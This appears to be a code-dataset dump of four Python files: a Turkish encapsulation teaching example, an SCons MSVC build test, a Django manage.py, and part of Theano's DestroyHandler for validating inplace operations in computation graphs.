Dataset schema (one record per source file; nullable fields noted):
- hexsha: string, length 40
- size: int64, 3 to 1.03M
- ext: string, 10 classes
- lang: string, 1 class
- max_stars_repo_path: string, length 3 to 972
- max_stars_repo_name: string, length 6 to 130
- max_stars_repo_head_hexsha: string, length 40 to 78
- max_stars_repo_licenses: list, length 1 to 10
- max_stars_count: int64, 1 to 191k, nullable
- max_stars_repo_stars_event_min_datetime: string, length 24, nullable
- max_stars_repo_stars_event_max_datetime: string, length 24, nullable
- max_issues_repo_path: string, length 3 to 972
- max_issues_repo_name: string, length 6 to 130
- max_issues_repo_head_hexsha: string, length 40 to 78
- max_issues_repo_licenses: list, length 1 to 10
- max_issues_count: int64, 1 to 116k, nullable
- max_issues_repo_issues_event_min_datetime: string, length 24, nullable
- max_issues_repo_issues_event_max_datetime: string, length 24, nullable
- max_forks_repo_path: string, length 3 to 972
- max_forks_repo_name: string, length 6 to 130
- max_forks_repo_head_hexsha: string, length 40 to 78
- max_forks_repo_licenses: list, length 1 to 10
- max_forks_count: int64, 1 to 105k, nullable
- max_forks_repo_forks_event_min_datetime: string, length 24, nullable
- max_forks_repo_forks_event_max_datetime: string, length 24, nullable
- content: string, length 3 to 1.03M
- avg_line_length: float64, 1.13 to 941k
- max_line_length: int64, 2 to 941k
- alphanum_fraction: float64, 0 to 1
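This layout matches a Hugging Face `datasets` export of per-file code records. As a minimal, hedged sketch of how such records could be loaded and filtered on the columns above (the dataset name below is a placeholder, not something stated in this document):

```python
# Minimal sketch, assuming a Hugging Face `datasets` export with the schema above.
# "your-org/your-code-dataset" is a hypothetical placeholder name.
from datasets import load_dataset

ds = load_dataset("your-org/your-code-dataset", split="train", streaming=True)

def keep(row):
    # Keep small, permissively licensed Python files that have at least one star.
    return (
        row["ext"] == "py"
        and row["size"] < 20_000
        and (row["max_stars_count"] or 0) >= 1
        and "MIT" in (row["max_stars_repo_licenses"] or [])
    )

for row in filter(keep, ds):
    print(row["max_stars_repo_path"], round(row["avg_line_length"], 2))
    break  # inspect just the first matching record
```

Streaming avoids materializing the full dump before filtering.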
hexsha: 84f1ba58276b441ec0efba4e71b268d5818704a9 | size: 1,036 | ext: py | lang: Python
max_stars_repo: path Notlar/ahmetbaran/OOP_2_Encapsulation.py | name ibrahimediz/ornekproje | head_hexsha c5ebeafc43a9c6d2aa639d0d95eedbce65991576 | licenses ["Apache-2.0"] | stars_count null | stars_event_min/max_datetime null
max_issues_repo: path Notlar/ahmetbaran/OOP_2_Encapsulation.py | name ibrahimediz/ornekproje | head_hexsha c5ebeafc43a9c6d2aa639d0d95eedbce65991576 | licenses ["Apache-2.0"] | issues_count null | issues_event_min/max_datetime null
max_forks_repo: path Notlar/ahmetbaran/OOP_2_Encapsulation.py | name ibrahimediz/ornekproje | head_hexsha c5ebeafc43a9c6d2aa639d0d95eedbce65991576 | licenses ["Apache-2.0"] | forks_count null | forks_event_min/max_datetime null
content:
class A:
def __init__(self,yetki):
self.yetki = yetki
self.__gizli = 2
# __gizli     -> hidden (name-mangled)
# __gizli_    -> hidden (name-mangled)
# __gizli__   -> not hidden (dunder names are not mangled)
obj1 = A(1)
print(obj1.yetki)
# print(obj1.__gizli) # AttributeError: 'A' object has no attribute '__gizli'
class A:
def __init__(self,yetki):
self.yetki = yetki
self.__gizli = 2
    @property  # the getter/setter/deleter below must all share this method's name
def gizli(self): # getter
if self.yetki == 1:
return self.__gizli
else:
raise Exception("Yetki Hatası")
@gizli.setter
def gizli(self,param):
if self.yetki == 1:
if isinstance(param,int) and param in range(10):
self.__gizli = param
else:
raise Exception("Değer Hatası")
else:
raise Exception("Yetki Hatası")
@gizli.deleter
def gizli(self):
if self.yetki == 1:
self.__gizli = -1*self.gizli
else:
raise Exception("Yetki Hatası")
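For illustration, here is a short usage sketch of the class above (not part of the original file); it exercises the property getter, setter, and deleter, and shows the authorization check rejecting access when yetki != 1:

```python
# Illustrative usage of the A class above (assumes the class definition is in scope).
admin = A(1)
print(admin.gizli)   # 2   -> getter allowed because yetki == 1
admin.gizli = 7      # setter accepts ints in range(10)
del admin.gizli      # deleter flips the sign: the hidden value becomes -7
print(admin.gizli)   # -7

guest = A(0)
try:
    print(guest.gizli)  # getter refuses access for yetki != 1
except Exception as err:
    print(err)          # "Yetki Hatası" (authorization error)
```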
avg_line_length: 26.564103 | max_line_length: 77 | alphanum_fraction: 0.572394

hexsha: 49ebe786db926dc0ed7c1ea2d2ebc8822fe87825 | size: 2,572 | ext: py | lang: Python
max_stars_repo: path test/MSVC/hierarchical.py | name jcassagnol-public/scons | head_hexsha 8eaf585a893757e68c9e4a6e25d375021fa5eab7 | licenses ["MIT"] | stars_count 1,403 | stars_event 2017-11-23T14:24:01.000Z to 2022-03-30T20:59:39.000Z
max_issues_repo: path test/MSVC/hierarchical.py | name jcassagnol-public/scons | head_hexsha 8eaf585a893757e68c9e4a6e25d375021fa5eab7 | licenses ["MIT"] | issues_count 3,708 | issues_event 2017-11-27T13:47:12.000Z to 2022-03-29T17:21:17.000Z
max_forks_repo: path test/MSVC/hierarchical.py | name jcassagnol-public/scons | head_hexsha 8eaf585a893757e68c9e4a6e25d375021fa5eab7 | licenses ["MIT"] | forks_count 281 | forks_event 2017-12-01T23:48:38.000Z to 2022-03-31T15:25:44.000Z
content:
#!/usr/bin/env python
#
# MIT License
#
# Copyright The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
Verify use of Visual Studio with a hierarchical build.
"""
import TestSCons
test = TestSCons.TestSCons(match = TestSCons.match_re)
test.skip_if_not_msvc()
test.subdir('src', 'build', 'out')
test.write('SConstruct', """
DefaultEnvironment(tools=[])
VariantDir('build', 'src', duplicate=0)
SConscript('build/SConscript')
""")
test.write('src/SConscript',"""
# TODO: this is order-dependent (putting 'mssdk' second or third breaks),
# and ideally we shouldn't need to specify the tools= list anyway.
env = Environment(tools=['mssdk', 'msvc', 'mslink'])
env['PCH'] = File('StdAfx.pch')
env['PDB'] = '#out/test.pdb'
env['PCHSTOP'] = 'StdAfx.h'
env.PCH('StdAfx.cpp')
env.Program('#out/test.exe', 'test.cpp')
""")
test.write('src/test.cpp', '''
#include "StdAfx.h"
int main(void)
{
return 1;
}
''')
test.write('src/StdAfx.h', '''
#include <windows.h>
''')
test.write('src/StdAfx.cpp', '''
#include "StdAfx.h"
''')
test.run(arguments='out', stderr=None)
test.must_exist(test.workpath('out/test.pdb'))
test.must_exist(test.workpath('build/StdAfx.pch'))
test.must_exist(test.workpath('build/StdAfx.obj'))
test.run(arguments='-c out')
test.must_not_exist(test.workpath('out/test.pdb'))
test.must_not_exist(test.workpath('build/StdAfx.pch'))
test.must_not_exist(test.workpath('build/StdAfx.obj'))
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
avg_line_length: 27.655914 | max_line_length: 74 | alphanum_fraction: 0.729782

hexsha: 6a1223d96b629f7f36a99805a57127aa1d59f096 | size: 538 | ext: py | lang: Python
max_stars_repo: path web/manage.py | name karlbishnu/NotZam | head_hexsha 5b3ec35a383b56f38fe623cb228063d13c1d3d91 | licenses ["MIT"] | stars_count null | stars_event_min/max_datetime null
max_issues_repo: path web/manage.py | name karlbishnu/NotZam | head_hexsha 5b3ec35a383b56f38fe623cb228063d13c1d3d91 | licenses ["MIT"] | issues_count 1 | issues_event 2018-11-27T06:41:17.000Z to 2018-11-27T06:41:17.000Z
max_forks_repo: path web/manage.py | name karlbishnu/NotZam | head_hexsha 5b3ec35a383b56f38fe623cb228063d13c1d3d91 | licenses ["MIT"] | forks_count null | forks_event_min/max_datetime null
content:
#!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'NotZam.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
avg_line_length: 33.625 | max_line_length: 73 | alphanum_fraction: 0.685874

hexsha: 61efc2de0856dfcbefe21bc60eb9db2ddcccbdbe | size: 43,056 | ext: py | lang: Python
max_stars_repo: path libs/Theano/theano/gof/destroyhandler.py | name dendisuhubdy/attention-lvcsr | head_hexsha 598d487c118e66875fdd625baa84ed29d283b800 | licenses ["MIT"] | stars_count 295 | stars_event 2015-09-25T21:15:04.000Z to 2022-01-13T01:16:18.000Z
max_issues_repo: path libs/Theano/theano/gof/destroyhandler.py | name shenshenzhanzhan/attention-lvcsr | head_hexsha 598d487c118e66875fdd625baa84ed29d283b800 | licenses ["MIT"] | issues_count 21 | issues_event 2015-10-28T19:06:32.000Z to 2022-03-11T23:13:05.000Z
max_forks_repo: path libs/Theano/theano/gof/destroyhandler.py | name shenshenzhanzhan/attention-lvcsr | head_hexsha 598d487c118e66875fdd625baa84ed29d283b800 | licenses ["MIT"] | forks_count 114 | forks_event 2015-09-26T21:23:02.000Z to 2021-11-19T02:36:41.000Z
content:
"""
Classes and functions for validating graphs that contain view
and inplace operations.
"""
from collections import deque
from six import iteritems
import theano
from . import toolbox
from . import graph
from theano.compat import OrderedDict
from theano.misc.ordered_set import OrderedSet
from .fg import InconsistencyError
from six.moves.queue import Queue
class ProtocolError(Exception):
"""
Raised when FunctionGraph calls DestroyHandler callbacks in
an invalid way, for example, pruning or changing a node that has
never been imported.
"""
pass
def _contains_cycle(fgraph, orderings):
"""
Parameters
----------
fgraph
The FunctionGraph to check for cycles.
orderings
Dictionary specifying extra dependencies besides those encoded in
Variable.owner / Apply.inputs.
If orderings[my_apply] == dependencies, then my_apply is an Apply
instance, dependencies is a set of Apply instances, and every member
of dependencies must be executed before my_apply.
The dependencies are typically used to prevent
inplace apply nodes from destroying their input before
other apply nodes with the same input access it.
Returns
-------
bool
True if the graph contains a cycle, False otherwise.
"""
# These are lists of Variable instances
outputs = fgraph.outputs
# this is hard-coded reimplementation of functions from graph.py
# reason: go faster, prepare for port to C.
# specifically, it could be replaced with a wrapper
# around graph.io_toposort that returns True iff io_toposort raises
# a ValueError containing the substring 'cycle'.
# This implementation is optimized for the destroyhandler and runs
# slightly faster than io_toposort.
# this is performance-critical code. it is the largest single-function
# bottleneck when compiling large graphs.
assert isinstance(outputs, (tuple, list, deque))
# TODO: For more speed - use a defaultdict for the orderings
# (defaultdict runs faster than dict in the case where the key
# is not in the dictionary, at least in CPython)
# IG: I tried converting parent_counts to use an id for the key,
# so that the dict would do reference counting on its keys.
# This caused a slowdown.
# Separate benchmark tests showed that calling id is about
# half as expensive as a dictionary access, and that the
# dictionary also runs slower when storing ids than when
# storing objects.
# dict mapping an Apply or Variable instance to the number
# of its parents (including parents imposed by orderings)
# that haven't been visited yet
parent_counts = {}
# dict mapping an Apply or Variable instance to its children
node_to_children = {}
# visitable: A container holding all Variable and Apply instances
# that can currently be visited according to the graph topology
# (ie, whose parents have already been visited)
# TODO: visitable is a fifo_queue. could this run faster if we
# implement it as a stack rather than a deque?
# TODO: visitable need not be a fifo_queue, any kind of container
# that we can throw things into and take things out of quickly will
# work. is there another kind of container that could run faster?
# we don't care about the traversal order here as much as we do
# in io_toposort because we aren't trying to generate an ordering
# on the nodes
visitable = deque()
# IG: visitable could in principle be initialized to fgraph.inputs
# + fgraph.orphans... if there were an fgraph.orphans structure.
# I tried making one and maintaining it caused a huge slowdown.
# This may be because I made it a list, so it would have a
# deterministic iteration order, in hopes of using it to speed
# up toposort as well.
# I think since we need to scan through all variables and nodes
# to make parent_counts anyway, it's cheap enough to always
# detect orphans at cycle detection / toposort time
# Pass through all the nodes to build visitable, parent_count, and
# node_to_children
for var in fgraph.variables:
# this is faster than calling get_parents
owner = var.owner
# variables don't appear in orderings, so we don't need to worry
# about that here
if owner:
# insert node in node_to_children[r]
# (if r is not already in node_to_children,
            # initialize it to [])
node_to_children.setdefault(owner, []).append(var)
parent_counts[var] = 1
else:
visitable.append(var)
parent_counts[var] = 0
for a_n in fgraph.apply_nodes:
parents = list(a_n.inputs)
# This is faster than conditionally extending
# IG: I tried using a shared empty_list = [] constructed
# outside of the for loop to avoid constructing multiple
# lists, but this was not any faster.
parents.extend(orderings.get(a_n, []))
if parents:
for parent in parents:
# insert node in node_to_children[r]
# (if r is not already in node_to_children,
                # initialize it to [])
node_to_children.setdefault(parent, []).append(a_n)
parent_counts[a_n] = len(parents)
else:
# an Apply with no inputs would be a weird case, but I'm
# not sure we forbid it
visitable.append(a_n)
parent_counts[a_n] = 0
# at this point,
# parent_counts.keys() == fgraph.apply_nodes + fgraph.variables
# Now we actually check for cycles
# As long as there are nodes that can be visited while respecting
# the topology, we keep visiting nodes
# If we run out of visitable nodes and we haven't visited all nodes,
# then there was a cycle. It blocked the traversal because some
# node couldn't be visited until one of its descendants had been
# visited too.
# This is a standard cycle detection algorithm.
visited = 0
while visitable:
# Since each node is inserted into the visitable queue exactly
# once, it comes out of the queue exactly once
# That means we can decrement its children's unvisited parent count
# and increment the visited node count without double-counting
node = visitable.popleft()
visited += 1
for client in node_to_children.get(node, []):
parent_counts[client] -= 1
# If all of a node's parents have been visited,
# it may now be visited too
if not parent_counts[client]:
visitable.append(client)
return visited != len(parent_counts)
def _build_droot_impact(destroy_handler):
droot = {} # destroyed view + nonview variables -> foundation
impact = {} # destroyed nonview variable -> it + all views of it
root_destroyer = {} # root -> destroyer apply
for app in destroy_handler.destroyers:
for output_idx, input_idx_list in app.op.destroy_map.items():
if len(input_idx_list) != 1:
raise NotImplementedError()
input_idx = input_idx_list[0]
input = app.inputs[input_idx]
            # Find non-view variable which is ultimately viewed by input.
view_i = destroy_handler.view_i
_r = input
while _r is not None:
r = _r
_r = view_i.get(r)
input_root = r
if input_root in droot:
raise InconsistencyError(
"Multiple destroyers of %s" % input_root)
droot[input_root] = input_root
root_destroyer[input_root] = app
# The code here add all the variables that are views of r into
# an OrderedSet input_impact
input_impact = OrderedSet()
queue = Queue()
queue.put(input_root)
while not queue.empty():
v = queue.get()
for n in destroy_handler.view_o.get(v, []):
input_impact.add(n)
queue.put(n)
for v in input_impact:
assert v not in droot
droot[v] = input_root
impact[input_root] = input_impact
impact[input_root].add(input_root)
return droot, impact, root_destroyer
def fast_inplace_check(inputs):
"""
    Return the variables in inputs that are possible candidates for use as inputs
    of inplace operations.
Parameters
----------
inputs : list
Inputs Variable that you want to use as inplace destination.
"""
fgraph = inputs[0].fgraph
Supervisor = theano.compile.function_module.Supervisor
protected_inputs = [f.protected for f in fgraph._features
if isinstance(f, Supervisor)]
protected_inputs = sum(protected_inputs, []) # flatten the list
protected_inputs.extend(fgraph.outputs)
inputs = [i for i in inputs if
not isinstance(i, graph.Constant) and
not fgraph.destroyers(i) and
i not in protected_inputs]
return inputs
if 0:
# old, non-incremental version of the DestroyHandler
class DestroyHandler(toolbox.Bookkeeper):
"""
The DestroyHandler class detects when a graph is impossible to evaluate
because of aliasing and destructive operations.
Several data structures are used to do this.
When an Op uses its view_map property to declare that an output may be
aliased to an input, then if that output is destroyed, the input is also
        considered to be destroyed. The view_maps of several Ops can feed into
one another and form a directed graph. The consequence of destroying any
variable in such a graph is that all variables in the graph must be
        considered to be destroyed, because they could all be referring to the
same underlying storage. In the current implementation, that graph is a
tree, and the root of that tree is called the foundation. The `droot`
property of this class maps from every graph variable to its foundation.
The `impact` property maps backward from the foundation to all of the
variables that depend on it. When any variable is destroyed, this class
marks the foundation of that variable as being destroyed, with the
`root_destroyer` property.
"""
droot = {}
"""
destroyed view + nonview variables -> foundation.
"""
impact = {}
"""
destroyed nonview variable -> it + all views of it.
"""
root_destroyer = {}
"""
root -> destroyer apply.
"""
def __init__(self, do_imports_on_attach=True):
self.fgraph = None
self.do_imports_on_attach = do_imports_on_attach
def on_attach(self, fgraph):
"""
When attaching to a new fgraph, check that
1) This DestroyHandler wasn't already attached to some fgraph
(its data structures are only set up to serve one)
2) The FunctionGraph doesn't already have a DestroyHandler.
This would result in it validating everything twice, causing
compilation to be slower.
TODO: WRITEME: what does this do besides the checks?
"""
# Do the checking #
already_there = False
if self.fgraph not in [None, fgraph]:
raise Exception("A DestroyHandler instance can only serve"
" one FunctionGraph. (Matthew 6:24)")
for attr in ('destroyers', 'destroy_handler'):
if hasattr(fgraph, attr):
already_there = True
if already_there:
# FunctionGraph.attach_feature catches AlreadyThere
# and cancels the attachment
raise toolbox.AlreadyThere(
"DestroyHandler feature is already present or in"
" conflict with another plugin.")
# end of checking #
def get_destroyers_of(r):
droot, impact, root_destroyer = self.refresh_droot_impact()
try:
return [root_destroyer[droot[r]]]
except Exception:
return []
fgraph.destroyers = get_destroyers_of
fgraph.destroy_handler = self
self.fgraph = fgraph
self.destroyers = OrderedSet() # set of Apply instances with non-null destroy_map
self.view_i = {} # variable -> variable used in calculation
self.view_o = {} # variable -> set of variables that use this one as a direct input
# clients: how many times does an apply use a given variable
self.clients = {} # variable -> apply -> ninputs
self.stale_droot = True
# IG: It's unclear if this is meant to be included in deployed code. It looks like
# it is unnecessary if FunctionGraph is working correctly, so I am commenting uses
# of it (for speed) but leaving the commented code in place so it is easy to restore
# for debugging purposes.
# Note: is there anything like the C preprocessor for python? It would be useful to
# just ifdef these things out
# self.debug_all_apps = set()
if self.do_imports_on_attach:
toolbox.Bookkeeper.on_attach(self, fgraph)
def refresh_droot_impact(self):
if self.stale_droot:
self.droot, self.impact, self.root_destroyer = _build_droot_impact(self)
self.stale_droot = False
return self.droot, self.impact, self.root_destroyer
def on_detach(self, fgraph):
if fgraph is not self.fgraph:
raise Exception("detaching wrong fgraph", fgraph)
del self.destroyers
del self.view_i
del self.view_o
del self.clients
del self.stale_droot
assert self.fgraph.destroyer_handler is self
delattr(self.fgraph, 'destroyers')
delattr(self.fgraph, 'destroy_handler')
self.fgraph = None
def on_import(self, fgraph, app, reason):
"""
Add Apply instance to set which must be computed.
"""
# if app in self.debug_all_apps: raise ProtocolError("double import")
# self.debug_all_apps.add(app)
# print 'DH IMPORT', app, id(app), id(self), len(self.debug_all_apps)
# If it's a destructive op, add it to our watch list
if getattr(app.op, 'destroy_map', {}):
self.destroyers.add(app)
# add this symbol to the forward and backward maps
for o_idx, i_idx_list in iteritems(getattr(app.op, 'view_map', {})):
if len(i_idx_list) > 1:
raise NotImplementedError(
'destroying this output invalidates multiple inputs',
(app. op))
o = app.outputs[o_idx]
i = app.inputs[i_idx_list[0]]
self.view_i[o] = i
self.view_o.setdefault(i, OrderedSet()).add(o)
# update self.clients
for i, input in enumerate(app.inputs):
self.clients.setdefault(input, {}).setdefault(app, 0)
self.clients[input][app] += 1
for i, output in enumerate(app.outputs):
self.clients.setdefault(output, {})
self.stale_droot = True
def on_prune(self, fgraph, app, reason):
"""
Remove Apply instance from set which must be computed.
"""
# if app not in self.debug_all_apps: raise ProtocolError("prune without import")
# self.debug_all_apps.remove(app)
# UPDATE self.clients
for i, input in enumerate(OrderedSet(app.inputs)):
del self.clients[input][app]
if getattr(app.op, 'destroy_map', {}):
self.destroyers.remove(app)
# Note: leaving empty client dictionaries in the struct.
# Why? It's a pain to remove them. I think they aren't doing any harm, they will be
# deleted on_detach().
# UPDATE self.view_i, self.view_o
for o_idx, i_idx_list in iteritems(getattr(app.op, 'view_map', {})):
if len(i_idx_list) > 1:
# destroying this output invalidates multiple inputs
raise NotImplementedError()
o = app.outputs[o_idx]
i = app.inputs[i_idx_list[0]]
del self.view_i[o]
self.view_o[i].remove(o)
if not self.view_o[i]:
del self.view_o[i]
self.stale_droot = True
def on_change_input(self, fgraph, app, i, old_r, new_r, reason):
"""
app.inputs[i] changed from old_r to new_r.
"""
if app == 'output':
# app == 'output' is special key that means FunctionGraph is redefining which nodes are being
# considered 'outputs' of the graph.
pass
else:
# if app not in self.debug_all_apps: raise ProtocolError("change without import")
# UPDATE self.clients
self.clients[old_r][app] -= 1
if self.clients[old_r][app] == 0:
del self.clients[old_r][app]
self.clients.setdefault(new_r, {}).setdefault(app, 0)
self.clients[new_r][app] += 1
# UPDATE self.view_i, self.view_o
for o_idx, i_idx_list in iteritems(getattr(app.op, 'view_map',
{})):
if len(i_idx_list) > 1:
# destroying this output invalidates multiple inputs
raise NotImplementedError()
i_idx = i_idx_list[0]
output = app.outputs[o_idx]
if i_idx == i:
if app.inputs[i_idx] is not new_r:
raise ProtocolError("wrong new_r on change")
self.view_i[output] = new_r
self.view_o[old_r].remove(output)
if not self.view_o[old_r]:
del self.view_o[old_r]
self.view_o.setdefault(new_r, OrderedSet()).add(output)
self.stale_droot = True
def validate(self, fgraph):
"""
Return None.
Raise InconsistencyError when
a) orderings() raises an error
b) orderings cannot be topologically sorted.
"""
if self.destroyers:
ords = self.orderings(fgraph)
if _contains_cycle(fgraph, ords):
raise InconsistencyError(
"Dependency graph contains cycles")
else:
# James's Conjecture:
# If there are no destructive ops, then there can be no cycles.
pass
return True
def orderings(self, fgraph):
"""
Return orderings induced by destructive operations.
Raise InconsistencyError when
            a) attempting to destroy an indestructible variable, or
b) attempting to destroy a value multiple times, or
c) an Apply destroys (illegally) one of its own inputs by aliasing
"""
rval = OrderedDict()
if self.destroyers:
# BUILD DATA STRUCTURES
# CHECK for multiple destructions during construction of variables
droot, impact, __ignore = self.refresh_droot_impact()
# check for destruction of constants
illegal_destroy = [
r for r in droot if
getattr(r.tag, 'indestructible', False) or
isinstance(r, graph.Constant)]
if illegal_destroy:
# print 'destroying illegally'
raise InconsistencyError(
"Attempting to destroy indestructible variables: %s" %
illegal_destroy)
# add destroyed variable clients as computational dependencies
for app in self.destroyers:
# for each destroyed input...
for output_idx, input_idx_list in iteritems(app.op.destroy_map):
destroyed_idx = input_idx_list[0]
destroyed_variable = app.inputs[destroyed_idx]
root = droot[destroyed_variable]
root_impact = impact[root]
# we generally want to put all clients of things which depend on root
# as pre-requisites of app.
# But, app is itself one such client!
# App will always be a client of the node we're destroying
# (destroyed_variable, but the tricky thing is when it is also a client of
# *another variable* viewing on the root. Generally this is illegal, (e.g.,
# add_inplace(x, x.T). In some special cases though, the in-place op will
# actually be able to work properly with multiple destroyed inputs (e.g,
# add_inplace(x, x). An Op that can still work in this case should declare
# so via the 'destroyhandler_tolerate_same' attribute or
# 'destroyhandler_tolerate_aliased' attribute.
#
# destroyhandler_tolerate_same should be a list of pairs of the form
# [(idx0, idx1), (idx0, idx2), ...]
# The first element of each pair is the input index of a destroyed
# variable.
# The second element of each pair is the index of a different input where
# we will permit exactly the same variable to appear.
# For example, add_inplace.tolerate_same might be [(0,1)] if the destroyed
# input is also allowed to appear as the second argument.
#
# destroyhandler_tolerate_aliased is the same sort of list of
# pairs.
# op.destroyhandler_tolerate_aliased = [(idx0, idx1)] tells the
# destroyhandler to IGNORE an aliasing between a destroyed
# input idx0 and another input idx1.
# This is generally a bad idea, but it is safe in some
# cases, such as
# - the op reads from the aliased idx1 before modifying idx0
# - the idx0 and idx1 are guaranteed not to overlap (e.g.
# they are pointed at different rows of a matrix).
#
# CHECK FOR INPUT ALIASING
# OPT: pre-compute this on import
tolerate_same = getattr(app.op,
'destroyhandler_tolerate_same',
[])
assert isinstance(tolerate_same, list)
tolerated = OrderedSet(idx1 for idx0, idx1 in
tolerate_same
if idx0 == destroyed_idx)
tolerated.add(destroyed_idx)
tolerate_aliased = getattr(
app.op, 'destroyhandler_tolerate_aliased', [])
assert isinstance(tolerate_aliased, list)
ignored = OrderedSet(idx1 for idx0, idx1
in tolerate_aliased
if idx0 == destroyed_idx)
# print 'tolerated', tolerated
# print 'ignored', ignored
for i, input in enumerate(app.inputs):
if i in ignored:
continue
if input in root_impact \
and (i not in tolerated or input is not destroyed_variable):
raise InconsistencyError("Input aliasing: %s (%i, %i)"
% (app, destroyed_idx, i))
# add the rule: app must be preceded by all other Apply instances that
# depend on destroyed_input
root_clients = OrderedSet()
for r in root_impact:
assert not [a for a, c in
iteritems(self.clients[r]) if not c]
root_clients.update([a for a, c in
iteritems(self.clients[r])
if c])
root_clients.remove(app)
if root_clients:
rval[app] = root_clients
return rval
class DestroyHandler(toolbox.Bookkeeper): # noqa
"""
The DestroyHandler class detects when a graph is impossible to evaluate
because of aliasing and destructive operations.
Several data structures are used to do this.
An Op can use its view_map property to declare that an output may be
aliased to an input. If that output is destroyed, the input is also
considered to be destroyed. The view_maps of several Ops can feed into
one another and form a directed graph. The consequence of destroying any
variable in such a graph is that all variables in the graph must be
    considered to be destroyed, because they could all be referring to the
same underlying storage.
In the current implementation, that graph is a tree, and the root of that
tree is called the foundation.
TODO: why "in the current implementation" ? is there another implementation
planned?
TODO: why is the graph a tree? isn't it possible that one variable could
be aliased to many variables? for example, don't switch and ifelse
have to do this?
The original DestroyHandler (if 0'ed out above) computed several data
structures from scratch each time it was asked to validate the graph.
Because this happens potentially thousands of times and each graph to
validate is extremely similar to the previous one, computing the
data structures from scratch repeatedly was wasteful and resulted in
high compile times for large graphs.
This implementation computes the data structures once at initialization
and then incrementally updates them.
It is a work in progress. The following data structures have been
converted to use the incremental strategy:
<none>
The following data structures remain to be converted:
<unknown>
"""
pickle_rm_attr = ["destroyers"]
def __init__(self, do_imports_on_attach=True):
self.fgraph = None
self.do_imports_on_attach = do_imports_on_attach
"""
Maps every variable in the graph to its "foundation" (deepest
ancestor in view chain).
TODO: change name to var_to_vroot.
"""
self.droot = OrderedDict()
"""
        Maps a variable to all variables that are indirect or direct views of it
        (including itself); essentially the inverse of droot.
TODO: do all variables appear in this dict, or only those that are
foundations?
TODO: do only destroyed variables go in here? one old docstring said so.
TODO: rename to x_to_views after reverse engineering what x is
"""
self.impact = OrderedDict()
"""
If a var is destroyed, then this dict will map
droot[var] to the apply node that destroyed var
TODO: rename to vroot_to_destroyer
"""
self.root_destroyer = OrderedDict()
def on_attach(self, fgraph):
"""
When attaching to a new fgraph, check that
1) This DestroyHandler wasn't already attached to some fgraph
(its data structures are only set up to serve one).
2) The FunctionGraph doesn't already have a DestroyHandler.
This would result in it validating everything twice, causing
compilation to be slower.
Give the FunctionGraph instance:
1) A new method "destroyers(var)"
TODO: what does this do exactly?
2) A new attribute, "destroy_handler"
TODO: WRITEME: what does this do besides the checks?
"""
# Do the checking #
already_there = False
if self.fgraph is fgraph:
already_there = True
if self.fgraph is not None:
raise Exception(
"A DestroyHandler instance can only serve one"
" FunctionGraph. (Matthew 6:24)")
for attr in ('destroyers', 'destroy_handler'):
if hasattr(fgraph, attr):
already_there = True
if already_there:
# FunctionGraph.attach_feature catches AlreadyThere and cancels the attachment
raise toolbox.AlreadyThere(
"DestroyHandler feature is already present"
" or in conflict with another plugin.")
# Annotate the FunctionGraph #
self.unpickle(fgraph)
fgraph.destroy_handler = self
self.fgraph = fgraph
self.destroyers = OrderedSet() # set of Apply instances with non-null destroy_map
self.view_i = OrderedDict() # variable -> variable used in calculation
self.view_o = OrderedDict() # variable -> set of variables that use this one as a direct input
# clients: how many times does an apply use a given variable
self.clients = OrderedDict() # variable -> apply -> ninputs
self.stale_droot = True
self.debug_all_apps = OrderedSet()
if self.do_imports_on_attach:
toolbox.Bookkeeper.on_attach(self, fgraph)
def unpickle(self, fgraph):
def get_destroyers_of(r):
droot, impact, root_destroyer = self.refresh_droot_impact()
try:
return [root_destroyer[droot[r]]]
except Exception:
return []
fgraph.destroyers = get_destroyers_of
def refresh_droot_impact(self):
"""
Makes sure self.droot, self.impact, and self.root_destroyer are up to
date, and returns them (see docstrings for these properties above).
"""
if self.stale_droot:
self.droot, self.impact, self.root_destroyer =\
_build_droot_impact(self)
self.stale_droot = False
return self.droot, self.impact, self.root_destroyer
def on_detach(self, fgraph):
if fgraph is not self.fgraph:
raise Exception("detaching wrong fgraph", fgraph)
del self.destroyers
del self.view_i
del self.view_o
del self.clients
del self.stale_droot
assert self.fgraph.destroyer_handler is self
delattr(self.fgraph, 'destroyers')
delattr(self.fgraph, 'destroy_handler')
self.fgraph = None
def on_import(self, fgraph, app, reason):
"""
Add Apply instance to set which must be computed.
"""
if app in self.debug_all_apps:
raise ProtocolError("double import")
self.debug_all_apps.add(app)
# print 'DH IMPORT', app, id(app), id(self), len(self.debug_all_apps)
# If it's a destructive op, add it to our watch list
if getattr(app.op, 'destroy_map', {}):
self.destroyers.add(app)
# add this symbol to the forward and backward maps
for o_idx, i_idx_list in iteritems(getattr(app.op, 'view_map', {})):
if len(i_idx_list) > 1:
raise NotImplementedError(
'destroying this output invalidates multiple inputs',
(app. op))
o = app.outputs[o_idx]
i = app.inputs[i_idx_list[0]]
self.view_i[o] = i
self.view_o.setdefault(i, OrderedSet()).add(o)
# update self.clients
for i, input in enumerate(app.inputs):
self.clients.setdefault(input, OrderedDict()).setdefault(app, 0)
self.clients[input][app] += 1
for i, output in enumerate(app.outputs):
self.clients.setdefault(output, OrderedDict())
self.stale_droot = True
